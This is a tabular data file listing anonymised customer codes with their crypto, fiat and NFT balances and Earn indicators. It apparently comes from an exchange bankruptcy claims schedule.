| 07376569 | | USD[0.00] | | |
| 07376570 | | USD[10.00] | | |
| 07376571 | | DOGE[0], SHIB[536.01608501] | | |
| 07376572 | | CUSDT[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376573 | | BAT[251.78086941], CUSDT[5], DOGE[1477.6873216], ETH[.02411688], ETHW[.02381592], LTC[.38339309], MATIC[12.1886273], SHIB[6620.32552108], SOL[1.83341076], TRX[5881.4100405], USD[19.78] | Yes | |
| 07376574 | | BRZ[1], CUSDT[35], TRX[4], USD[0.00], USDT[0.00000001] | | |
| 07376575 | | BAT[1], CUSDT[1], TRX[2], USD[13813.60] | | |
| 07376576 | | BTC[.00000043], USD[0.00] | | |
| 07376577 | | USD[10.00] | | |
| 07376578 | | BTC[.00013102], CUSDT[1], DOGE[579.02074583], ETH[.0063343], ETHW[.0063343], SOL[2.25980676], USD[50.00] | | |
| 07376579 | | DOGE[138.56908299], USD[0.00] | | |
| 07376580 | | DOGE[1423.99045998], USD[10.00] | | |
| 07376581 | | USD[10.00] | | |
| 07376582 | | USD[10.00] | | |
| 07376583 | | BRZ[1], CUSDT[5], DOGE[1162.77896078], TRX[1], USD[0.00] | Yes | |
| 07376585 | | BRZ[2], BTC[.04850998], ETHW[.99760659], GRT[30.55218113], MATIC[.03321931], SHIB[5], SUSHI[.30964326], TRX[7], USD[2168.99], USDT[1.05632325] | Yes | |
| 07376586 | | USD[10.00] | | |
| 07376587 | | BRZ[1], TRX[5], USD[0.00] | | |
| 07376588 | | TRX[99.89051403], USD[0.20] | | |
| 07376589 | | DOGE[32.45198606], USD[0.00] | | |
| 07376590 | | USD[10.00] | | |
| 07376592 | | USD[10.00] | | |
| 07376593 | | BTC[.00017798], USD[0.00] | | |
| 07376594 | | BRZ[1], DOGE[574.14946420], ETH[.02990978], ETHW[.02990978], LTC[.27267197], TRX[243.12411693], USD[0.00] | | |
| 07376595 | | CUSDT[2], DOGE[1], LTC[.00484166], TRX[2], USD[0.01] | | |
| 07376596 | | USD[10.00] | | |
| 07376597 | | USD[10.00] | | |
| 07376598 | | USD[10.00] | | |
| 07376599 | | DOGE[142.31860923], USD[0.00] | | |
| 07376600 | | DOGE[3246.9177622], USD[0.00] | Yes | |
| 07376601 | | DOGE[183.43363178], USD[0.00] | | |
| 07376602 | | USD[10.00] | | |
| 07376603 | | USD[0.16] | | |
| 07376604 | | USD[10.00] | | |
| 07376606 | | BF_POINT[700], BRZ[4], BTC[0.01862647], CUSDT[95.2812244], DOGE[2], ETHW[.87377187], MATIC[.03238569], NEAR[15.96761151], SHIB[18217412.23617212], SOL[.00000001], TRX[13.00065661], USD[0.14] | Yes | |
| 07376607 | | BRZ[1], BTC[.00855607], CUSDT[1], DOGE[3], ETH[.11322859], ETHW[.11211329], SHIB[1], TRX[2579.65466782], USD[0.01] | Yes | |
| 07376608 | | USD[10.00] | | |
| 07376610 | | USD[10.00] | | |
| 07376611 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07376612 | | USD[10.00] | | |
| 07376613 | | BTC[0], CUSDT[8], DOGE[0], ETH[0], SHIB[1], TRX[2], USD[0.01] | | |
| 07376614 | | USD[10.00] | | |
| 07376616 | | CUSDT[1], USD[27.13] | | |
| 07376617 | | BRZ[1], CUSDT[5.10601421], DOGE[1353.10973245], GRT[1.00019173], SOL[3.31024604], USD[0.00] | Yes | |
| 07376618 | | DOGE[0], TRX[12.96220034], USD[0.00], USDT[0] | Yes | |
| 07376619 | | DOGE[140.95338615], USD[10.00] | | |
| 07376620 | | USD[15.51] | | |
| 07376621 | | AVAX[620.40343568], BF_POINT[100], BRZ[9.17225284], BTC[1.01256625], CUSDT[7], DOGE[8545.2884166], ETH[0.05438351], ETHW[.00009356], GRT[4], LINK[.00000705], SHIB[7], SOL[0], TRX[111, UNI[2.07753748], USD[7552.28], USDT[5.21015216] | Yes | |
| 07376622 | | BRZ[1], DOGE[2668.61583565], USD[0.00] | | |
| 07376623 | | BRZ[1], DOGE[31152.90024681], TRX[2], USD[10.84] | Yes | |
| 07376624 | | USD[10.00] | | |
| 07376625 | | USD[10.00] | | |
| 07376626 | | TRX[2], USD[0.00] | | |
| 07376628 | | BRZ[1], BTC[.0037734], CUSDT[4], DOGE[1225.79723053], TRX[1], USD[0.00] | Yes | |
| 07376629 | | CUSDT[2], USD[0.00] | | |
| 07376630 | | USD[10.00] | | |
| 07376631 | | BCH[.18818157], BTC[.0037081], CUSDT[21], DOGE[2], USD[45.98] | | |
| 07376632 | | CUSDT[227.16026203], DOGE[22.68942378], SHIB[6382645.7856255], USD[0.01] | | |
| 07376633 | | BCH[0], BF_POINT[100], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LTC[0], SHIB[4], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0.00838077] | Yes | |
| 07376634 | | CUSDT[3], DOGE[4782.48658702], USD[100.00] | | |
| 07376635 | | DOGE[132.36196761], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376636 | | ETH[.0053619], ETHW[.0053619], USD[0.00] | | |
| 07376637 | | USD[0.00] | | |
| 07376638 | | USD[10.00] | | |
| 07376639 | | USD[10.00] | | |
| 07376640 | | USD[0.12] | | |
| 07376644 | | CUSDT[1], SHIB[128994.36805830], USD[0.00] | | |
| 07376645 | | USD[10.00] | | |
| 07376646 | | USD[10.00] | | |
| 07376647 | | BRZ[0], USD[0.01] | | |
| 07376648 | | USD[10.00] | | |
| 07376649 | | USD[0.00] | | |
| 07376650 | | BRZ[1], DOGE[6883.76975056], USD[10.00] | | |
| 07376651 | | LTC[.05582929], USD[0.00] | | |
| 07376652 | | CUSDT[70.24218099], DOGE[156.13689223], USD[0.50] | | |
| 07376653 | | DOGE[.00000146], USD[0.00] | | |
| 07376654 | | USD[0.00] | | |
| 07376655 | | CUSDT[8], DOGE[61.02534767], SHIB[4960947.62478872], TRX[1326.59199721], USD[18.02] | Yes | |
| 07376656 | | CUSDT[11], DOGE[20.91966872], USD[0.00] | | |
| 07376657 | | USD[0.01] | | |
| 07376658 | | USD[10.00] | | |
| 07376659 | | BAT[.10410295], BTC[.00021373], ETH[.00000028], ETHW[.00000028], USD[0.00] | | |
| 07376660 | | USD[10.00] | | |
| 07376661 | | DOGE[1], USD[0.00] | | |
| 07376662 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07376663 | | DOGE[122.74505067], USD[0.00] | | |
| 07376664 | | DOGE[4], TRX[1], USD[0.00] | | |
| 07376667 | | CUSDT[3], GRT[1], TRX[3], USD[161.17] | | |
| 07376668 | | BTC[.00000003], CUSDT[2], DOGE[.00036418], USD[0.00] | | |
| 07376669 | | DOGE[1], USD[9.94] | | |
| 07376670 | | BRZ[1], DOGE[256.54042226], USD[0.00] | | |
| 07376671 | | USD[10.00] | | |
| 07376672 | | CUSDT[1.07477851], USD[0.00] | | |
| 07376673 | | CUSDT[1], DOGE[1427.73729152], USD[0.00] | | |
| 07376675 | | BTC[0], CUSDT[39.75091004], DOGE[0], ETH[0], LINK[.1588544], TRX[4], USD[0.00] | | |
| 07376677 | | NFT (421172520657495155/Entrance Voucher #1932)[1], USD[0.00] | | |
| 07376678 | | USD[10.00] | | |
| 07376679 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07376680 | | BAT[1], BRZ[2], CUSDT[14], DOGE[1.00698539], GRT[3], LTC[.00096602], TRX[10], USD[0.54], USDT[0] | | |
| 07376681 | | DOGE[16751.41611036] | | |
| 07376682 | | USD[10.00] | | |
| 07376683 | | BAT[.01402184], DOGE[272.70703975], USD[0.00] | Yes | |
| 07376684 | | DOGE[139.30052193], TRX[1], USD[0.00] | | |
| 07376686 | | TRX[2], USD[0.01], USDT[1] | | |
| 07376687 | | GRT[1], SUSHI[1.59117991], TRX[1], USD[10.00] | | |
| 07376688 | | USD[10.00] | | |
| 07376689 | | DOGE[1], USD[0.00] | | |
| 07376690 | | BAT[1.01402431], BRZ[1], DOGE[11417.7999198], GRT[267.78048292], TRX[14411.99866272], USD[0.00] | Yes | |
| 07376691 | | USD[10.00] | | |
| 07376692 | | USD[10.00] | | |
| 07376693 | | BRZ[2], CUSDT[16], DOGE[2865.22248821], GRT[1.00089262], KSHIB[733.60014859], SHIB[5509064.65642924], TRX[9], USD[0.54] | | |
| 07376694 | | DOGE[0], USD[0.00] | | |
| 07376695 | | USD[10.00] | | |
| 07376696 | | USD[10.00] | | |
| 07376698 | | CUSDT[4], DOGE[2891.66205244], USD[0.00] | Yes | |
| 07376699 | | USD[10.00] | | |
| 07376700 | | USD[10.00] | | |
| 07376701 | | CUSDT[3], DOGE[1.16000234], GRT[1], SUSHI[3.80691594], TRX[1], USD[0.01] | Yes | |
| 07376702 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376703 | | USD[10.00] | | |
| 07376704 | | BAT[1.0165555], BRZ[5.07952967], CUSDT[8], DOGE[0], ETH[0], LTC[0], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07376706 | | BTC[0], DOGE[0.00199905], USD[0.00], USDT[0] | | |
| 07376708 | | USD[10.00] | | |
| 07376709 | | KSHIB[101.37558498], USD[0.00], USDT[0] | Yes | |
| 07376710 | | USD[10.00] | | |
| 07376711 | | USD[10.00] | | |
| 07376712 | | ALGO[0], ETH[0], ETHW[0], SHIB[8], USD[0.28], USDT[0] | | |
| 07376713 | | DOGE[145.0033793], USD[0.00] | | |
| 07376714 | | USD[10.00] | | |
| 07376715 | | USD[10.00] | | |
| 07376716 | | USD[3.16], USDT[5.2906] | | |
| 07376717 | | USD[10.00] | | |
| 07376718 | | USD[10.00] | | |
| 07376719 | | BRZ[1], CUSDT[4], USD[0.01], USDT[0] | | |
| 07376720 | | BAT[2], BRZ[1], DOGE[1753.92865197], GRT[1], TRX[746.58223352], USD[0.00] | | |
| 07376721 | | DOGE[18.63507435], USD[0.00] | | |
| 07376722 | | USD[10.00] | | |
| 07376723 | | BRZ[1], CUSDT[12], DOGE[480.11237235], TRX[2], USD[0.21] | | |
| 07376724 | | BRZ[1], CUSDT[2], TRX[4], USD[0.00] | | |
| 07376725 | | CUSDT[1], USD[0.01], USDT[0] | | |
| 07376726 | | CUSDT[1], DOGE[207.41788585], USD[0.00] | | |
| 07376728 | | USD[20.00] | | |
| 07376729 | | DOGE[0], TRX[3], USD[0.00] | | |
| 07376730 | | USD[10.00] | | |
| 07376731 | | DOGE[2528.69225142], SHIB[6014990.61893239], TRX[2927.75120059], USD[0.00] | | |
| 07376732 | | CUSDT[3], DOGE[2], USD[0.01] | | |
| 07376733 | | USD[10.00] | | |
| 07376734 | | CUSDT[1], DOGE[1175.67471788], GRT[18.22018717], SOL[8.33069714], TRX[1], USD[0.00] | | |
| 07376735 | | BTC[0.00160040], DOGE[0], ETH[0], GRT[0], LTC[0], NFT (315325173995468344/Moonshine Parrot)[1], NFT (484457967341379698/Colorful Hawk)[1], SOL[0], SUSHI[0], UNI[0], USD[15.18], USDT[0] | | |
| 07376736 | | BTC[.00021185], CUSDT[5], DOGE[1], USD[0.00] | | |
| 07376737 | | USD[10.00] | | |
| 07376738 | | USD[10.00] | | |
| 07376739 | | USD[10.00] | | |
| 07376740 | | BTC[.00030304], DOGE[2], USD[0.00] | | |
| 07376741 | | BRZ[1], CUSDT[1], DOGE[36.48242046], USD[0.00] | | |
| 07376742 | | CUSDT[1], DOGE[153.65050379], TRX[1], USD[0.00] | | |
| 07376743 | | USD[10.00] | | |
| 07376744 | | USD[0.00] | | |
| 07376745 | | USD[10.00] | | |
| 07376746 | | BTC[0], CUSDT[9], DOGE[0], ETH[.01521127], MATIC[0], SHIB[19.34589662], TRX[1], USD[0.00], YFI[0] | Yes | |
| 07376747 | | DOGE[1133.34321484], USD[0.00] | | |
| 07376748 | | USD[7.96] | | |
| 07376749 | | USD[10.95] | Yes | |
| 07376750 | | CUSDT[2], DOGE[2089.81968878], USD[0.01] | Yes | |
| 07376751 | | CUSDT[5], TRX[3], USD[0.00] | | |
| 07376753 | | USD[0.00] | Yes | |
| 07376754 | | CUSDT[1], DOGE[.04947697], GRT[1], USD[0.01] | | |
| 07376756 | | DOGE[2926.36680947], TRX[2], USD[0.02] | Yes | |
| 07376757 | | NFT (293680664558208354/Warriors Hoop #536 (Redeemed))[1], NFT (312561405390808939/Golden Hill #320)[1], NFT (346674609447442589/GSW Western Conference Finals Commemorative Banner #1298)[1], NFT (413965207676859091/GSW Western Conference Finals Commemorative Banner #1297)[1], NFT (451949263244901673/GSW Western Conference Finals Commemorative Banner #654 (Redeemed))[1], NFT (507957591379672974/GSW Western Conference Semifinals Commemorative Ticket #685)[1], NFT (553862263424901673/Romeo #349)[1], NFT (554626490471011925/GSW Championship Commemorative Ring)[1], SOL[.0031], USD[2.01], USDT[1.874178] | | |
| 07376758 | | BTC[.00006692], GRT[1.04381], SOL[.24753313], USD[0.08], YFI[.00005702] | | |
| 07376759 | | USD[10.00] | | |
| 07376760 | | BTC[.0010055], CUSDT[4], DOGE[229.31305737], GRT[2.37703835], TRX[77.99713805], USD[0.01] | Yes | |
| 07376761 | | DOGE[122.31130698], USD[0.00] | | |
| 07376762 | | BTC[.00201779], DOGE[451.15752991], ETH[.02517969], USD[0.14] | Yes | |
| 07376763 | | ETHW[.11418001], SHIB[3.00000003], TRX[1], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376764 | | USD[10.00] | | |
| 07376765 | | USD[10.00] | | |
| 07376766 | | USD[0.00] | | |
| 07376767 | | BRZ[2], SHIB[3], TRX[1], USD[0.00] | Yes | |
| 07376768 | | DOGE[31.27734519], USD[0.00] | | |
| 07376769 | | DOGE[40.8612589], USD[0.00] | | |
| 07376770 | | ETH[.0057026], ETHW[.0057026], USD[0.00] | | |
| 07376771 | | DOGE[1], USD[0.01] | | |
| 07376772 | | CUSDT[1], DOGE[.00017916], TRX[1], USD[0.00] | | |
| 07376773 | | USD[9.53] | | |
| 07376774 | | USD[10.00] | | |
| 07376775 | | USD[10.00] | | |
| 07376776 | | USD[10.00] | | |
| 07376777 | | CUSDT[4], DOGE[1], USD[0.00] | | |
| 07376778 | | CUSDT[3], DOGE[1.04670063], TRX[2], USD[65.52], YFI[.00033024] | | |
| 07376779 | | SOL[.00000001], USD[0.00], USDT[0.00000001] | Yes | |
| 07376780 | | USD[10.00] | | |
| 07376781 | | USD[10.00] | | |
| 07376782 | | TRX[1], USD[0.00] | | |
| 07376783 | | BRZ[6], CUSDT[19], DOGE[2974.03455995], GRT[14.9355942], KSHIB[2787.51316751], SHIB[10461749.26557079], TRX[6], USD[0.00], USDT[1] | | |
| 07376784 | | DOGE[36.43534111], USD[0.00] | | |
| 07376785 | | BAT[2.11645078], BRZ[4], CUSDT[7], DOGE[2], SHIB[3], SOL[18.83357976], TRX[4], USD[0.00], USDT[1.10196548] | Yes | |
| 07376786 | | USD[10.00] | | |
| 07376787 | | BRZ[2], TRX[1], USD[1171.81] | Yes | |
| 07376788 | | TRX[1], USD[0.08], USDT[0] | | |
| 07376789 | | DOGE[.87013079], USD[0.72] | | |
| 07376790 | | USD[10.00] | | |
| 07376791 | | DOGE[3990.66800495], USD[0.00], USDT[1.10852626] | Yes | |
| 07376792 | | BTC[0], SOL[.00000001] | | |
| 07376793 | | BRZ[3], CUSDT[4], GRT[3], TRX[6], USD[0.01], USDT[1] | | |
| 07376794 | | USD[0.00] | | |
| 07376795 | | BRZ[2], DOGE[.0004498], TRX[1], USD[0.00] | | |
| 07376796 | | CUSDT[1], USD[16.57] | | |
| 07376797 | | USD[10.00] | | |
| 07376798 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07376799 | | BRZ[1], USD[0.00] | | |
| 07376800 | | USD[0.00], USDT[0] | | |
| 07376802 | | CAD[12.46], USD[0.00] | | |
| 07376803 | | BF_POINT[300], DOGE[33.38907319], USD[0.00] | | |
| 07376804 | | BTC[0], CUSDT[9], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07376805 | | BRZ[1], CUSDT[3], DOGE[9668.71685623], TRX[11], USD[0.00] | Yes | |
| 07376806 | | DOGE[0], ETH[0.00004000], ETHW[0.00004000], USD[0.00] | | |
| 07376807 | | USD[9.93] | | |
| 07376808 | | CUSDT[8], TRX[2], USD[80.19] | | |
| 07376809 | | BTC[0], DOGE[0], ETH[0], SOL[0.00007481], TRX[0], USD[0.00], USDT[0] | | |
| 07376810 | | CUSDT[1], DOGE[224.54515958], USD[0.00], USDT[0] | | |
| 07376811 | | BTC[.00000004], USD[0.00] | Yes | |
| 07376812 | | CUSDT[1], DOGE[2054.14967979], USD[10.00] | | |
| 07376813 | | USD[10.00] | | |
| 07376814 | | USD[11.84] | | |
| 07376815 | | BRZ[1], CUSDT[1], DOGE[.00009477], TRX[1], USD[242.66] | | |
| 07376816 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07376817 | | DOGE[1.00395549], TRX[2], USD[0.00] | | |
| 07376818 | | USD[10.00] | | |
| 07376819 | | USD[10.00] | | |
| 07376820 | | BAT[2.04555144], BRZ[16.10984488], CUSDT[67.74957536], DAI[.00101748], DOGE[9.25873547], ETHW[0], GRT[1], SOL[.0008007], TRX[36.59394697], USD[0.00], USDT[2.13493498] | Yes | |
| 07376821 | | CUSDT[17], DOGE[329.40355964], ETH[.01166356], ETHW[.01166356], TRX[1], USD[0.45] | | |
| 07376822 | | USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376824 | | USD[10.00] | | |
| 07376825 | | CUSDT[4], GRT[80.17878693], USD[0.00] | Yes | |
| 07376826 | | USD[10.00] | | |
| 07376827 | | USD[10.00] | | |
| 07376828 | | USD[10.00] | | |
| 07376829 | | BCH[0], BTC[0.00095678], USD[0.00] | | |
| 07376830 | | BAT[1.0165555], BRZ[1], CUSDT[3], TRX[5.00002684], USD[0.01] | Yes | |
| 07376831 | | CUSDT[1], DOGE[207.64450687], SHIB[63180.51819391], TRX[1.00205366], USD[0.00] | | |
| 07376832 | | BRZ[2], BTC[0], CUSDT[5], DOGE[1], SOL[0], TRX[0], USD[0.00] | | |
| 07376833 | | DOGE[135.87141129], USD[0.00] | | |
| 07376834 | | CUSDT[1], TRX[1], USD[0.01], USDT[1] | | |
| 07376835 | | BCH[.00065922], BRZ[4], BTC[.00000001], CUSDT[27], DOGE[0], ETH[0], GRT[0], LINK[.00001317], LTC[0.00099112], SOL[.00000043], SUSHI[0.00005485], TRX[2.00285496], UNI[.00012212], USD[0.00], USDT[1] | | |
| 07376836 | | CUSDT[1], DOGE[1.00004581], USD[0.00] | | |
| 07376837 | | BTC[0.11750000], DOGE[352.55867612], ETH[2.50000000], ETHW[2.50000000], SOL[900.50000000], USD[0.00] | | |
| 07376838 | | CUSDT[2], DOGE[370.23367204], TRX[1], USD[0.00] | | |
| 07376839 | | USD[7.95] | | |
| 07376841 | | ALGO[32.27869255], BTC[.00251601], CUSDT[4], DOGE[828.24973886], ETH[.02566436], ETHW[.02534972], GRT[98.21820912], LINK[4.04037426], MATIC[80.94809878], SHIB[7], SOL[2.73424805], TRX[2], USD[8.32] | Yes | |
| 07376842 | | USD[10.00] | | |
| 07376844 | | BTC[.00300239], CUSDT[4], DOGE[.40086929], ETH[.01108578], ETHW[.01094898], USD[1.35] | Yes | |
| 07376845 | | USD[10.00] | | |
| 07376846 | | USD[10.00] | | |
| 07376847 | | CUSDT[1], DOGE[497.78361805], USD[0.00] | | |
| 07376848 | | DOGE[136.34461412], USD[0.00] | Yes | |
| 07376850 | | USD[10.00] | | |
| 07376851 | | USD[10.00] | | |
| 07376852 | | CUSDT[528.3721651], DOGE[459.49854736], TRX[4], USD[0.00] | Yes | |
| 07376853 | | USD[10.00] | | |
| 07376854 | | BRZ[2], CUSDT[7], DOGE[.8525794], TRX[.18211361], USD[0.07] | | |
| 07376855 | | CUSDT[2], USD[0.44], USDT[0] | | |
| 07376858 | | USD[10.00] | | |
| 07376859 | | BAT[1], BRZ[1], BTC[.0001707], CUSDT[4], DOGE[715.75210062], GRT[8.62408204], USD[0.00] | | |
| 07376860 | | USD[10.00] | | |
| 07376861 | | USD[10.00] | | |
| 07376862 | | USD[10.00] | | |
| 07376863 | | BTC[0.00050758], CUSDT[2], DOGE[.00067451], TRX[1], USD[0.00] | | |
| 07376864 | | DOGE[1], USD[0.00] | | |
| 07376865 | | BRZ[1], BTC[.00016134], CUSDT[1543.86539065], DOGE[0], KSHIB[1253.57071138], SHIB[148617.27554735], TRX[123.12491766], USD[-13.08] | Yes | |
| 07376866 | | BTC[0.00173853], CUSDT[.0000041], DOGE[0.01020844], ETH[0.09499469], ETHW[.01769206], KSHIB[.00057661], NFT (30107934699741639/Entrance Voucher #4264)[1], SHIB[168373.10644557], SOL[0.00027172], TRX[0.84136286], USD[0.01] | Yes | |
| 07376867 | | DOGE[311.2528989], TRX[218.368458], USD[0.00] | | |
| 07376868 | | USD[354.75] | Yes | |
| 07376869 | | BTC[0], CUSDT[1], USD[0.00] | Yes | |
| 07376870 | | CUSDT[2], DOGE[1], USD[34.45] | | |
| 07376871 | | BAT[1], CUSDT[1], SHIB[251.98333333], TRX[2], USD[0.00] | | |
| 07376873 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07376874 | | ETH[.00000001], ETHW[.00140437], USD[1.81] | Yes | |
| 07376875 | Contingent, Disputed | DOGE[.07923828], USD[3.72] | | |
| 07376876 | | USD[0.02] | | |
| 07376877 | | USD[10.00] | | |
| 07376878 | | BCH[.04227385], BRZ[1], BTC[.00197525], CUSDT[1203.93584286], DOGE[777.72875301], ETH[.03068393], ETHW[.03030089], GRT[55.10757304], LINK[2.20245958], LTC[.18607235], MATIC[23.98969894], SOL[1.54478466], SUSHI[1.89637903], TRX[664.81387009], UNI[.37585791], USD[0.36], USDT[112.15769756] | Yes | |
| 07376879 | | BCH[.01886335], DOGE[264.60328351], USD[0.00] | | |
| 07376880 | | CUSDT[1], DOGE[96.82316863], ETH[.00301036], ETHW[.00297132], LTC[.22344116], NFT (487434152906073769/Careless Cat #380)[1], NFT (561619875376560381/CryptoPet #2013)[1], SHIB[4], SOL[1.32978062], USD[2.16] | Yes | |
| 07376882 | | BRZ[1], USD[291.45] | | |
| 07376883 | | USD[10.00] | | |
| 07376884 | | DOGE[17.68024485], USD[0.00] | | |
| 07376885 | | DOGE[2000.75946037], SHIB[602020.09128464], USD[0.00], USDT[0] | | |
| 07376886 | | BRZ[1.00001799], DOGE[1.00003796], USD[0.00] | | |
| 07376887 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376889 | | DOGE[65.96315641], USD[0.00] | | |
| 07376891 | | USD[20.00] | | |
| 07376892 | | USD[0.00] | | |
| 07376893 | | USD[10.00] | | |
| 07376894 | | CUSDT[4], USD[0.01] | Yes | |
| 07376896 | | USD[10.00] | | |
| 07376897 | | DOGE[1], TRX[1], USD[28.26] | | |
| 07376898 | | USD[0.00] | | |
| 07376900 | | BTC[.00022071], CUSDT[1], DOGE[397.26821017], USD[0.00] | | |
| 07376901 | | USD[10.00] | | |
| 07376902 | | USD[20.00] | | |
| 07376903 | | USD[10.00] | | |
| 07376904 | | USD[20.00] | | |
| 07376905 | | USD[0.01] | | |
| 07376906 | | DOGE[1311.68796569], USD[10.00] | | |
| 07376907 | | USD[0.00] | | |
| 07376908 | | USD[10.00] | | |
| 07376909 | | DOGE[146.23943109], USD[0.00] | | |
| 07376911 | | BTC[.01346978], DOGE[1528.26373223], ETH[1.11216031], ETHW[1.11169323], GRT[370.47046712], LINK[12.98094821], LTC[9.58555251], SHIB[3185796.56421938], SOL[7.98195468], SUSHI[193.33908473], TRX[7730.57392176], UNI[1.10770851], USD[0.00] | Yes | |
| 07376912 | | CUSDT[1], TRX[1], USD[0.37] | | |
| 07376913 | | SHIB[20.92024539], USD[0.00] | | |
| 07376914 | | USD[10.00] | | |
| 07376915 | | USD[10.00] | | |
| 07376916 | | CUSDT[2], DOGE[101.10703275], USD[0.00] | | |
| 07376917 | | USD[10.00] | | |
| 07376918 | | USD[10.00] | | |
| 07376919 | | BTC[.01078845], DOGE[4794.57109344], NFT (327312410986251611/Fancy Frenchies #9093)[1], NFT (339961111777428880/Settler #2438)[1], NFT (341740764742906683/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #57)[1], NFT (363802493244764822/SharkBro #5584)[1], NFT (477777387746484821/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #62)[1], NFT (490735741129067777/Kiddo #5419)[1], NFT (505573039098483302/Entrance Voucher #2194)[1], NFT (514496805050085367/Kiddo #5709)[1], NFT (544514901512270132/Solana Penguin #556)[1], SOL[2.16579123], TRX[7443.52868801], USD[0.00] | Yes | |
| 07376920 | | USD[0.00], USDT[0] | | |
| 07376921 | | ETH[.0020008], ETHW[.0020008], USD[5.00] | | |
| 07376922 | | DOGE[5401.29822903], TRX[1], USD[10.00] | | |
| 07376923 | | DOGE[1], LINK[.00176374], SHIB[26747.76046201], USD[0.01] | | |
| 07376924 | | USD[10.00] | | |
| 07376925 | | CUSDT[15.11567489], DOGE[1532.22471779], KSHIB[1258.73092545], SOL[12.06819149], TRX[6313.223164], USD[0.00], USDT[1.16591279] | Yes | |
| 07376926 | | BTC[.0001077], DOGE[59.46643856], ETH[.00283825], ETHW[.00283825], USD[15.00] | | |
| 07376927 | | USD[10.00] | | |
| 07376928 | | USD[10.00] | | |
| 07376929 | | USD[10.00] | | |
| 07376930 | | USD[10.00] | | |
| 07376932 | | USD[10.00] | | |
| 07376933 | | USD[0.00] | | |
| 07376934 | | DOGE[102.55548335], TRX[1], USD[3.67] | | |
| 07376935 | | CUSDT[1], DOGE[96.60019495], USD[0.29] | | |
| 07376936 | | USD[20.00] | | |
| 07376938 | | DOGE[279.51029854], USD[0.00] | | |
| 07376939 | | USD[10.00] | | |
| 07376940 | | USD[0.13] | | |
| 07376942 | | BAT[1], BRZ[3], CUSDT[9], DOGE[4], ETH[0.600964379], ETHW[0.600700676], NFT (492697645888784241/This Guy Probes)[1], SHIB[8], SOL[7.76815593], TRX[12.00800266], USD[0.01], USDT[0] | Yes | |
| 07376943 | | USD[10.00] | | |
| 07376944 | | USD[20.00] | | |
| 07376945 | | USD[10.00] | | |
| 07376946 | | BTC[0], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00] | | |
| 07376947 | | BTC[.00008814], USD[0.00] | | |
| 07376948 | | DOGE[165.83970696], USD[0.00] | | |
| 07376949 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07376951 | | USD[10.00] | | |
| 07376952 | | BAT[1], BRZ[4], CUSDT[17], DOGE[10950.95287578], GRT[1], TRX[2], USD[0.01], USDT[2] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376953 | | CUSDT[3], USD[0.01] | | |
| 07376954 | | USD[10.00] | | |
| 07376955 | | CUSDT[4], NFT (516385433223071337/Coachella x FTX Weekend 1 #11050)[1], SOL[0.00000807], TRX[0], USD[0.00] | Yes | |
| 07376956 | | CUSDT[1], DOGE[.00000958], USD[1.00] | | |
| 07376958 | | CUSDT[5131.74482901], DOGE[63982.27538879], SHIB[14001875.22615468], TRX[599.79236263], USD[0.00] | Yes | |
| 07376959 | | TRX[1], USD[211.56] | | |
| 07376960 | | DOGE[.06550209], USD[0.00] | | |
| 07376961 | | USD[10.00] | | |
| 07376962 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07376963 | | BRZ[1], BTC[0], CUSDT[8], DOGE[0], USD[0.00] | | |
| 07376964 | | CUSDT[1], DOGE[8.15765306], USD[0.00] | | |
| 07376965 | | USD[10.00] | | |
| 07376966 | | BRZ[5], CAD[0.07], CUSDT[.08430002], DOGE[4679.74840002], ETH[.01044501], ETHW[.01044501], LINK[.00081075], LTC[3.01455051], PAXG[.00000007], SHIB[3877670.25266808], SOL[23.88013239], TRX[10.00047609], USD[552.66], USDT[1] | | |
| 07376967 | | BAT[0], DOGE[0], ETH[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07376968 | | CUSDT[6], USD[0.01] | | |
| 07376969 | | DOGE[0], ETH[0], ETHW[0], SHIB[25647301.47859769], USD[284.66], USDT[0.00000001] | Yes | |
| 07376970 | | USD[10.92] | Yes | |
| 07376971 | | BRZ[2], CUSDT[2], USD[0.01] | | |
| 07376972 | | BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0.60726098], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], USD[0.00] | Yes | |
